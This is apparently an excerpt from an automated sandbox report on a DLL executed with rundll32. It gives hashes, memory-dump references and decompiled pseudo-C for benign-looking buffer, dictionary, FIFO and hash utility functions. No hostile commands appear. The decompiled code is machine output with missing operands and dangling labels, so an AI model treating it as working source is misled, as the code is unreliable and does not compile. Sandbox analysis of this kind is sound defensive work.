                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
                                                                      • String ID: Last message repeated %d times$%s%s%s%s$[%s]
                                                                      • API String ID: 4275616186-1378087399
                                                                      • Opcode ID: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
                                                                      • Instruction ID: d1eb8843b360d500b767063b44c9564666ae391a763e2864b4dfe10f501dd800
                                                                      • Opcode Fuzzy Hash: 92fe572d3c91f27e652c46d7d51aebd23f6a1e44d33db3be991a07085aa6e5fb
                                                                      • Instruction Fuzzy Hash: B661C0749093C18FD720CF24D8807AABBE2FF85344F85885EE8CA57342D736A945DB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 36%
                                                                      			E10009130() {
                                                                      				int _t86;
                                                                      				void* _t91;
                                                                      				void* _t93;
                                                                      				signed char _t99;
                                                                      				void* _t111;
                                                                      				signed char _t113;
                                                                      				void* _t114;
                                                                      				void* _t118;
                                                                      				signed char _t119;
                                                                      				void* _t121;
                                                                      				int _t122;
                                                                      				void* _t123;
                                                                      				unsigned int _t124;
                                                                      				unsigned int _t125;
                                                                      				signed int _t126;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				int _t132;
                                                                      				void* _t136;
                                                                      				signed char _t139;
                                                                      				signed char _t141;
                                                                      				void* _t142;
                                                                      				void* _t143;
                                                                      				signed int _t144;
                                                                      				int _t145;
                                                                      				void* _t147;
                                                                      				signed int _t148;
                                                                      				signed int _t151;
                                                                      				int _t153;
                                                                      				signed int _t154;
                                                                      				void _t158;
                                                                      				void* _t159;
                                                                      				char* _t161;
                                                                      				void** _t162;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void** _t167;
                                                                      				void*** _t168;
                                                                      
                                                                      				_t86 = _t168[0x111];
                                                                      				_t167 = _t168[0x110];
                                                                      				if( *_t86 == 0) {
                                                                      					L40:
                                                                      					return _t86;
                                                                      				} else {
                                                                      					_t118 = _t167[2];
                                                                      					while(1) {
                                                                      						_t145 = _t167[1];
                                                                      						_t88 =  <=  ? _t145 : _t118;
                                                                      						_t121 = _t118 - ( <=  ? _t145 : _t118);
                                                                      						if(_t121 != 0) {
                                                                      							goto L15;
                                                                      						}
                                                                      						 *_t168 = _t168[0x111];
                                                                      						_t9 = strlen(??) + 1; // 0x1
                                                                      						_t159 = _t9;
                                                                      						L11:
                                                                      						_t124 = _t167[3];
                                                                      						if(_t124 == _t118 || _t145 >= _t118) {
                                                                      							L22:
                                                                      							_t95 =  <=  ? _t118 : _t145;
                                                                      							_t119 = _t118 - ( <=  ? _t118 : _t145);
                                                                      							if(_t119 > 0x3ff) {
                                                                      								L26:
                                                                      								_t139 = _t119;
                                                                      								_t147 =  *_t167 + _t145;
                                                                      								if(_t119 >= 8) {
                                                                      									if((_t147 & 0x00000001) != 0) {
                                                                      										 *_t147 = 0x21;
                                                                      										_t139 = _t119 - 1;
                                                                      										_t147 = _t147 + 1;
                                                                      									}
                                                                      									if((_t147 & 0x00000002) != 0) {
                                                                      										 *_t147 = 0x2121;
                                                                      										_t139 = _t139 - 2;
                                                                      										_t147 = _t147 + 2;
                                                                      									}
                                                                      									if((_t147 & 0x00000004) != 0) {
                                                                      										 *_t147 = 0x21212121;
                                                                      										_t139 = _t139 - 4;
                                                                      										_t147 = _t147 + 4;
                                                                      									}
                                                                      									_t125 = _t139;
                                                                      									_t139 = _t139 & 0x00000003;
                                                                      									_t126 = _t125 >> 2;
                                                                      									memset(_t147, 0x21212121, _t126 << 2);
                                                                      									_t168 =  &(_t168[3]);
                                                                      									_t147 = _t147 + _t126;
                                                                      									if((_t139 & 0x00000004) == 0) {
                                                                      										goto L29;
                                                                      									} else {
                                                                      										goto L28;
                                                                      									}
                                                                      									goto L40;
                                                                      								} else {
                                                                      									if((_t139 & 0x00000004) != 0) {
                                                                      										L28:
                                                                      										 *_t147 = 0x21212121;
                                                                      										_t147 = _t147 + 4;
                                                                      									}
                                                                      								}
                                                                      								L29:
                                                                      								if((_t139 & 0x00000002) != 0) {
                                                                      									 *_t147 = 0x2121;
                                                                      									_t147 = _t147 + 2;
                                                                      								}
                                                                      								if((_t139 & 0x00000001) != 0) {
                                                                      									 *_t147 = 0x21;
                                                                      								}
                                                                      								_t161 = "[truncated strftime output]";
                                                                      								_t99 =  <=  ? _t119 : 0x1b;
                                                                      								_t141 =  *_t167 + _t167[1];
                                                                      								if(0x1b >= 4) {
                                                                      									if((_t141 & 0x00000001) != 0) {
                                                                      										_t141 = _t141 + 1;
                                                                      										_t161 = "truncated strftime output]";
                                                                      										_t99 = _t99 - 1;
                                                                      										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
                                                                      									}
                                                                      									if((_t141 & 0x00000002) != 0) {
                                                                      										_t148 =  *_t161 & 0x0000ffff;
                                                                      										_t141 = _t141 + 2;
                                                                      										_t161 =  &(_t161[2]);
                                                                      										_t99 = _t99 - 2;
                                                                      										 *(_t141 - 2) = _t148;
                                                                      									}
                                                                      									if(_t99 >= 4) {
                                                                      										_t168[7] = _t99;
                                                                      										_t131 = 0;
                                                                      										_t151 = _t99 & 0xfffffffc;
                                                                      										do {
                                                                      											 *(_t141 + _t131) = _t161[_t131];
                                                                      											_t131 = _t131 + 4;
                                                                      										} while (_t131 < _t151);
                                                                      										_t99 = _t168[7];
                                                                      										_t141 = _t141 + _t131;
                                                                      										_t161 =  &(_t161[_t131]);
                                                                      									}
                                                                      								}
                                                                      								_t130 = 0;
                                                                      								if((_t99 & 0x00000002) != 0) {
                                                                      									_t130 = 2;
                                                                      									 *_t141 =  *_t161 & 0x0000ffff;
                                                                      								}
                                                                      								if((_t99 & 0x00000001) != 0) {
                                                                      									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
                                                                      								}
                                                                      								_t142 = _t167[1];
                                                                      								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
                                                                      								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
                                                                      								_t136 = _t167[2];
                                                                      								_t167[1] = 0xfffffffa;
                                                                      								if(_t136 != 0) {
                                                                      									L39:
                                                                      									_t138 =  >  ? _t86 : _t136 - 1;
                                                                      									_t93 =  *_t167;
                                                                      									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
                                                                      									return _t93;
                                                                      								}
                                                                      								goto L40;
                                                                      							} else {
                                                                      								_t162 =  &(_t168[8]);
                                                                      								 *_t168 = _t162;
                                                                      								_t168[3] = _t168[0x112];
                                                                      								_t168[2] = _t168[0x111];
                                                                      								_t86 = 0x400;
                                                                      								_t168[1] = 0x400;
                                                                      								L100A07D0();
                                                                      								if(0x400 != 0) {
                                                                      									_t168[2] = _t162;
                                                                      									_t168[1] = 0x100af500;
                                                                      									 *_t168 = _t167;
                                                                      									return L100089C0();
                                                                      								} else {
                                                                      									if(_t119 != 0) {
                                                                      										_t145 = _t167[1];
                                                                      										goto L26;
                                                                      									}
                                                                      									goto L40;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
                                                                      							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
                                                                      							if(_t124 >> 1 >= _t118) {
                                                                      								_t118 = _t118 + _t118;
                                                                      							} else {
                                                                      								_t118 = _t124;
                                                                      							}
                                                                      							if(_t118 < _t111) {
                                                                      								_t115 =  <=  ? _t124 : _t111;
                                                                      								_t118 =  <=  ? _t124 : _t111;
                                                                      							}
                                                                      							_t165 =  *_t167;
                                                                      							_t168[1] = _t118;
                                                                      							if(_t165 ==  &(_t167[4])) {
                                                                      								 *_t168 = 0;
                                                                      								_t113 = L10028DA0();
                                                                      								if(_t113 == 0) {
                                                                      									goto L21;
                                                                      								} else {
                                                                      									goto L19;
                                                                      								}
                                                                      							} else {
                                                                      								 *_t168 = _t165;
                                                                      								_t113 = L10028DA0();
                                                                      								if(_t113 == 0) {
                                                                      									L21:
                                                                      									_t118 = _t167[2];
                                                                      									_t145 = _t167[1];
                                                                      									goto L22;
                                                                      								} else {
                                                                      									if(_t165 == 0) {
                                                                      										L19:
                                                                      										_t153 = _t167[1];
                                                                      										_t143 = _t113;
                                                                      										_t166 =  *_t167;
                                                                      										_t132 = _t153 + 1;
                                                                      										_t168[7] = _t166;
                                                                      										if(_t132 >= 8) {
                                                                      											if((_t113 & 0x00000001) != 0) {
                                                                      												_t144 =  *_t166 & 0x000000ff;
                                                                      												_t132 = _t153;
                                                                      												_t166 = _t166 + 1;
                                                                      												 *_t113 = _t144;
                                                                      												_t82 = _t113 + 1; // 0x1
                                                                      												_t143 = _t82;
                                                                      											}
                                                                      											if((_t143 & 0x00000002) != 0) {
                                                                      												_t154 =  *_t166 & 0x0000ffff;
                                                                      												_t143 = _t143 + 2;
                                                                      												_t166 = _t166 + 2;
                                                                      												_t132 = _t132 - 2;
                                                                      												 *(_t143 - 2) = _t154;
                                                                      											}
                                                                      											if((_t143 & 0x00000004) != 0) {
                                                                      												_t158 =  *_t166;
                                                                      												_t143 = _t143 + 4;
                                                                      												_t166 = _t166 + 4;
                                                                      												_t132 = _t132 - 4;
                                                                      												 *(_t143 - 4) = _t158;
                                                                      											}
                                                                      										}
                                                                      										_t114 = memcpy(_t143, _t166, _t132);
                                                                      										_t168 =  &(_t168[3]);
                                                                      									}
                                                                      									 *_t167 = _t114;
                                                                      									_t167[2] = _t118;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L66;
                                                                      						L15:
                                                                      						_t168[1] = _t121;
                                                                      						_t168[7] = _t121;
                                                                      						_t168[3] = _t168[0x112];
                                                                      						_t168[2] = _t168[0x111];
                                                                      						_t91 =  *_t167;
                                                                      						 *_t168 = _t91 + _t145;
                                                                      						L100A07D0();
                                                                      						if(_t91 != 0) {
                                                                      							_t122 = _t167[1];
                                                                      							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
                                                                      							_t136 = _t167[2];
                                                                      							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
                                                                      							_t167[1] = _t86;
                                                                      							if(_t136 != 0) {
                                                                      								goto L39;
                                                                      							}
                                                                      							goto L40;
                                                                      						} else {
                                                                      							_t123 = _t168[7];
                                                                      							_t159 = 0x7fffffff;
                                                                      							_t145 = _t167[1];
                                                                      							_t118 = _t167[2];
                                                                      							if(_t123 <= 0x3fffffff) {
                                                                      								_t159 = _t123 + _t123;
                                                                      							}
                                                                      							goto L11;
                                                                      						}
                                                                      						goto L66;
                                                                      					}
                                                                      				}
                                                                      				L66:
                                                                      			}









































                                                                      0x10009257
                                                                      0x1000925e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000917f
                                                                      0x1000917f
                                                                      0x10009182
                                                                      0x10009189
                                                                      0x10009281
                                                                      0x10009281
                                                                      0x10009284
                                                                      0x00000000
                                                                      0x1000918f
                                                                      0x10009191
                                                                      0x10009260
                                                                      0x10009260
                                                                      0x10009263
                                                                      0x10009265
                                                                      0x10009268
                                                                      0x1000926b
                                                                      0x10009272
                                                                      0x10009382
                                                                      0x10009495
                                                                      0x10009498
                                                                      0x1000949a
                                                                      0x1000949b
                                                                      0x1000949d
                                                                      0x1000949d
                                                                      0x1000949d
                                                                      0x1000938b
                                                                      0x10009480
                                                                      0x10009483
                                                                      0x10009486
                                                                      0x10009489
                                                                      0x1000948c
                                                                      0x1000948c
                                                                      0x10009394
                                                                      0x1000939a
                                                                      0x1000939c
                                                                      0x1000939f
                                                                      0x100093a2
                                                                      0x100093a5
                                                                      0x100093a5
                                                                      0x10009394
                                                                      0x1000927a
                                                                      0x1000927a
                                                                      0x1000927a
                                                                      0x10009197
                                                                      0x1000919a
                                                                      0x00000000
                                                                      0x1000919a
                                                                      0x10009189
                                                                      0x10009179
                                                                      0x00000000
                                                                      0x100091f8
                                                                      0x100091f8
                                                                      0x10009203
                                                                      0x10009207
                                                                      0x10009212
                                                                      0x10009216
                                                                      0x1000921b
                                                                      0x1000921e
                                                                      0x10009225
                                                                      0x10009438
                                                                      0x10009444
                                                                      0x10009447
                                                                      0x1000944a
                                                                      0x1000944c
                                                                      0x10009451
                                                                      0x00000000
                                                                      0x10009457
                                                                      0x00000000
                                                                      0x1000922b
                                                                      0x1000922b
                                                                      0x1000922f
                                                                      0x10009234
                                                                      0x10009237
                                                                      0x10009240
                                                                      0x10009246
                                                                      0x10009246
                                                                      0x00000000
                                                                      0x10009240
                                                                      0x00000000
                                                                      0x10009225
                                                                      0x1000919d
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_reallocstrftimestrlen
                                                                      • String ID: !!!!$[truncated strftime output]
                                                                      • API String ID: 709960874-1743851734
                                                                      • Opcode ID: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
                                                                      • Instruction ID: 6237faa146818e252d6bc5810784fdb2c70fb651bac13d65fe422c41695cf2e5
                                                                      • Opcode Fuzzy Hash: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
                                                                      • Instruction Fuzzy Hash: 40A19071A042429FE715CF28C98539E77E2EF843D0F268528ED898B399E735DE45CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: mv_expr_parse_and_evalmv_logstrcmp
                                                                      • String ID: 9$all$default$max$min$none
                                                                      • API String ID: 638344568-340763830
                                                                      • Opcode ID: 3a43cda7731b7cc6d1eec2ee77c04c39d1a710ebf161850413e893610c0bccc0
                                                                      • Instruction ID: 7e14d16d44837c53f6e0618a54e32c20455491f957ac13e1facf48bed44ae4fc
                                                                      • Opcode Fuzzy Hash: 3a43cda7731b7cc6d1eec2ee77c04c39d1a710ebf161850413e893610c0bccc0
                                                                      • Instruction Fuzzy Hash: 1F5128759097468BC395DF28E04029BFBE5FFC9354F518A2EE9C9C7200EB70E8448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: AMBI%d$NONE$USR%d
                                                                      • API String ID: 2490314137-3656852315
                                                                      • Opcode ID: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
                                                                      • Instruction ID: 0a946672120a056d3661d42bdbf04e5838db89b9617306f254fc419f9ddf239a
                                                                      • Opcode Fuzzy Hash: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
                                                                      • Instruction Fuzzy Hash: 41117FB4919745CBE314EF28C480A5EB7E0FF84380F51C92EF68897254C334AA419B93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: ambisonic ACN %d$none$user %d
                                                                      • API String ID: 2490314137-4180635230
                                                                      • Opcode ID: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
                                                                      • Instruction ID: b6a1bd800e9813b9dae9be9b31ba14f11150b02b1f0a339f321a001e9bfab4f6
                                                                      • Opcode Fuzzy Hash: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
                                                                      • Instruction Fuzzy Hash: B71172B4909B558BE320DF24C48096EB7E0FF847C4F51881EF5D887289D334A981DB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E10030180(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                      				char _v32;
                                                                      				intOrPtr _v48;
                                                                      				char* _v52;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				char* _v84;
                                                                      				intOrPtr _v88;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t33;
                                                                      				intOrPtr _t37;
                                                                      				char* _t41;
                                                                      				intOrPtr* _t45;
                                                                      				intOrPtr _t52;
                                                                      				char* _t53;
                                                                      				intOrPtr* _t54;
                                                                      				void* _t55;
                                                                      				intOrPtr* _t56;
                                                                      				void* _t64;
                                                                      
                                                                      				_t56 = _t55 - 0x4c;
                                                                      				_t45 = _a8;
                                                                      				_v32 = 0;
                                                                      				_t53 = _a4;
                                                                      				_t52 = _a12;
                                                                      				if(_t45 == 0) {
                                                                      					L10:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t54 = 0;
                                                                      					while(1) {
                                                                      						_v84 = _t54;
                                                                      						_v80 = 2;
                                                                      						_v88 = 0x100b75dd;
                                                                      						 *_t56 =  *_t45;
                                                                      						_t33 = E100110D0();
                                                                      						_t54 = _t33;
                                                                      						if(_t33 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_v80 = _t52;
                                                                      						_v84 = _a4;
                                                                      						 *_t56 = _t53;
                                                                      						_v88 =  *_t54;
                                                                      						_t37 = L1002F6A0(_t45, _t52, _t53, _t54, _t64);
                                                                      						if(_t37 == 0xabafb008) {
                                                                      							_v80 = 0;
                                                                      							_v84 = _a4;
                                                                      							_v88 =  *_t54;
                                                                      							_t41 =  &_v32;
                                                                      							 *_t56 = _t41;
                                                                      							_v52 = _t41;
                                                                      							_t37 = E10011210(_t45, _t52, _t53, _t54);
                                                                      							if(_t37 >= 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								goto L6;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t37 >= 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								_v52 =  &_v32;
                                                                      								L6:
                                                                      								_v48 = _t37;
                                                                      								_v76 = _a4;
                                                                      								_v84 = "Error setting option %s to value %s.\n";
                                                                      								_v88 = 0x10;
                                                                      								 *_t56 = _t53;
                                                                      								_v80 =  *_t54;
                                                                      								E10026560();
                                                                      								 *_t56 = _v52;
                                                                      								L10011CC0();
                                                                      								return _v48;
                                                                      							}
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					 *_t56 = _t45;
                                                                      					L10011CC0();
                                                                      					 *_t45 = _v32;
                                                                      					goto L10;
                                                                      				}
                                                                      				L11:
                                                                      			}

                                                                      APIs
                                                                      Strings
                                                                      • Error setting option %s to value %s., xrefs: 10030217
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_dict_free$mv_dict_getmv_dict_setmv_logmv_opt_set
                                                                      • String ID: Error setting option %s to value %s.
                                                                      • API String ID: 3258142065-3279051434
                                                                      • Opcode ID: 1a9d09993977aecac0336f7559c27a5d9f97f57d75cbac26b23ac616c45300c0
                                                                      • Instruction ID: dd90fc101553d41281afc15f61c3f85b5a8b12bd015060489efb1d4e53b39e8a
                                                                      • Opcode Fuzzy Hash: 1a9d09993977aecac0336f7559c27a5d9f97f57d75cbac26b23ac616c45300c0
                                                                      • Instruction Fuzzy Hash: 623192B9A097049FC740DF69D48065BBBE4FF88394F41882EF99CCB310E674E9409B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 32%
                                                                      			E10002670(void* __ecx, void* __edx) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t39;
                                                                      				void* _t44;
                                                                      				signed int _t50;
                                                                      				signed int _t52;
                                                                      				signed int _t53;
                                                                      				intOrPtr* _t54;
                                                                      				signed int _t55;
                                                                      				signed int _t65;
                                                                      				void* _t66;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t70;
                                                                      				void* _t71;
                                                                      				signed int* _t72;
                                                                      
                                                                      				_t72 = _t71 - 0x3c;
                                                                      				_t72[4] = 1;
                                                                      				_t69 = _t72[0x14];
                                                                      				_t52 = _t72[0x15];
                                                                      				_t72[2] = _t72[0x16];
                                                                      				_t72[3] = _t69;
                                                                      				_t72[1] = _t52;
                                                                      				 *_t72 =  &(_t72[0xb]);
                                                                      				if(L1003CB90(_t52, __edx, 1, _t66) < 0) {
                                                                      					L14:
                                                                      					return 0;
                                                                      				} else {
                                                                      					 *_t72 = 0x1c;
                                                                      					_t39 = E10029100();
                                                                      					_t65 = _t39;
                                                                      					if(_t39 == 0) {
                                                                      						goto L14;
                                                                      					} else {
                                                                      						 *(_t39 + 0x10) = _t52;
                                                                      						 *(_t39 + 0x14) = _t69;
                                                                      						asm("cdq");
                                                                      						 *(_t65 + 0x18) = _t72[0xb] / _t72[0x16];
                                                                      						 *_t72 = _t69;
                                                                      						L1003CB70();
                                                                      						_t53 =  ==  ? 1 : _t52;
                                                                      						 *(_t65 + 4) = _t53;
                                                                      						_t72[1] = 4;
                                                                      						 *_t72 = _t53;
                                                                      						_t44 = E100291F0();
                                                                      						 *_t65 = _t44;
                                                                      						if(_t44 == 0) {
                                                                      							L13:
                                                                      							 *_t72 = _t65;
                                                                      							L100290D0();
                                                                      							goto L14;
                                                                      						} else {
                                                                      							_t70 = 0;
                                                                      							if( *(_t65 + 4) > 0) {
                                                                      								while(1) {
                                                                      									_t68 = _t70 * 4;
                                                                      									_t72[2] = 0;
                                                                      									_t54 = _t44 + _t68;
                                                                      									_t72[1] = 1;
                                                                      									 *_t72 = _t72[0xb];
                                                                      									 *_t54 = L10017E40(_t54, _t65, _t68);
                                                                      									_t44 =  *_t65;
                                                                      									if( *((intOrPtr*)(_t44 + _t68)) == 0) {
                                                                      										break;
                                                                      									}
                                                                      									_t70 = _t70 + 1;
                                                                      									if( *(_t65 + 4) <= _t70) {
                                                                      										goto L15;
                                                                      									} else {
                                                                      										continue;
                                                                      									}
                                                                      									goto L16;
                                                                      								}
                                                                      								if(_t44 != 0) {
                                                                      									if( *(_t65 + 4) > 0) {
                                                                      										_t55 = 0;
                                                                      										while(1) {
                                                                      											_t50 = _t44 + _t55 * 4;
                                                                      											_t55 = _t55 + 1;
                                                                      											 *_t72 = _t50;
                                                                      											L10018950(_t55);
                                                                      											if(_t55 >=  *(_t65 + 4)) {
                                                                      												goto L12;
                                                                      											}
                                                                      											_t44 =  *_t65;
                                                                      										}
                                                                      									}
                                                                      									L12:
                                                                      									 *_t72 = _t65;
                                                                      									E100290E0();
                                                                      								}
                                                                      								goto L13;
                                                                      							} else {
                                                                      								L15:
                                                                      								 *(_t65 + 0xc) = _t72[0x16];
                                                                      								return _t65;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L16:
                                                                      			}






















                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
                                                                      • String ID:
                                                                      • API String ID: 3721653357-0
                                                                      • Opcode ID: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
                                                                      • Instruction ID: e2c14ad1b6a78883c2eba2dd48e6cbb770f894d0147dffab9e861290766f1c48
                                                                      • Opcode Fuzzy Hash: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
                                                                      • Instruction Fuzzy Hash: 34311AB86087068FD700DF6AD58061AFBE4FF88394F51892EE99CC7211E774E855CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
                                                                      • String ID:
                                                                      • API String ID: 1780169607-0
                                                                      • Opcode ID: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
                                                                      • Instruction ID: c35801f6e3b9458600ddf5c5e3e107538d07f14f20f18202b00d36dbdc320db3
                                                                      • Opcode Fuzzy Hash: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
                                                                      • Instruction Fuzzy Hash: C731E5B4116350CED740EF50D548A86BAE0FF00354FA7C5A9D61A4F222C7BED584DBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 46%
                                                                      			E1001E360(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr* _t25;
                                                                      				intOrPtr _t27;
                                                                      				void* _t31;
                                                                      				intOrPtr _t32;
                                                                      				intOrPtr _t36;
                                                                      				intOrPtr* _t38;
                                                                      				void* _t40;
                                                                      				intOrPtr _t46;
                                                                      				intOrPtr _t49;
                                                                      				void* _t52;
                                                                      				intOrPtr* _t54;
                                                                      
                                                                      				_t40 = __ecx;
                                                                      				_v12 = __esi;
                                                                      				_t49 = _a4;
                                                                      				_v8 = __edi;
                                                                      				_v16 = __ebx;
                                                                      				_v4 = __ebp;
                                                                      				_t46 =  *((intOrPtr*)(_t49 + 4));
                                                                      				 *_t54 = 0x10;
                                                                      				_t25 = E10029100();
                                                                      				_t38 = _t25;
                                                                      				if(_t25 == 0) {
                                                                      					_t52 = 0xfffffff4;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					_t27 = L1001AC40(_t38, _t46, _t49);
                                                                      					 *_t38 = _t27;
                                                                      					if(_t27 == 0) {
                                                                      						L6:
                                                                      						_t52 = 0xfffffff4;
                                                                      						goto L7;
                                                                      					} else {
                                                                      						 *_t54 = _t27;
                                                                      						_v56 = _a12;
                                                                      						_t31 = L1001BC40();
                                                                      						_t52 = _t31;
                                                                      						if(_t31 < 0) {
                                                                      							L7:
                                                                      							_t20 = _t38 + 4; // 0x4
                                                                      							 *_t54 = _t20;
                                                                      							E1000A000(_t38, _t49);
                                                                      							 *_t54 = _t38;
                                                                      							L1001ADB0(_t38);
                                                                      							L8:
                                                                      							 *_t54 = _t38;
                                                                      							L100290D0();
                                                                      						} else {
                                                                      							 *_t54 = _t49;
                                                                      							_t32 = L10009FC0(_t38, _t40);
                                                                      							 *((intOrPtr*)(_t38 + 4)) = _t32;
                                                                      							if(_t32 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t38 + 8)) = _a16;
                                                                      								 *((intOrPtr*)(_t38 + 0xc)) = _a20;
                                                                      								_v52 = 0x1001d8d0;
                                                                      								_v44 = 0;
                                                                      								_v48 = _t46;
                                                                      								_v56 = 0x10;
                                                                      								 *_t54 = _t38;
                                                                      								_t36 = L10009E60(_t38, _t46, _t49, _t52);
                                                                      								 *((intOrPtr*)(_a8 + 0xb8)) = _t36;
